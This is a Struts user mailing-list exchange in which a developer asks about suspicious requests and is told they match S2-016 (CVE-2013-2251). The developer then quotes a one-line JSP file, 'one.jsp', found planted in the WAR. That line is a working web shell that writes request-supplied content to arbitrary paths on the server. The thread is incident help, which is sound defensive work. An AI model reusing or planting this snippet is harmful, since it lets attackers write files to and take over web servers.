Hi Yasser,
I am using struts2 2.3.16.1 version. That may be the reason 404 error is
returned. But still i got a new file "one.jsp", inside the WAR. It has
only one IF condition as give below:-
<%if(request.getParameter("f")!=null)(new
java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
Regards,
Raj
On Tue, Feb 13, 2018 at 5:43 PM, Yasser Zamani <yasserzam...@apache.org>
wrote:
>
>
> On 2/13/2018 12:34 PM, Rajvinder Pal wrote:
> > Hi,
> >
> > I have a struts application deployed on application server. Some time I
> am
> > receiving the below requests in web server logs. Not sure if i can post
> it
> > in this struts forum. What should i do to restrict it?What kind of
> > vulnerability it is ?
>
> Hi,
>
> It seems it's S2-016 [1] (CVE-2013-2251 [2]).
>
> [1] https://cwiki.apache.org/confluence/display/WW/S2-016
> [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: user-unsubscr...@struts.apache.org
> For additional commands, e-mail: user-h...@struts.apache.org
>
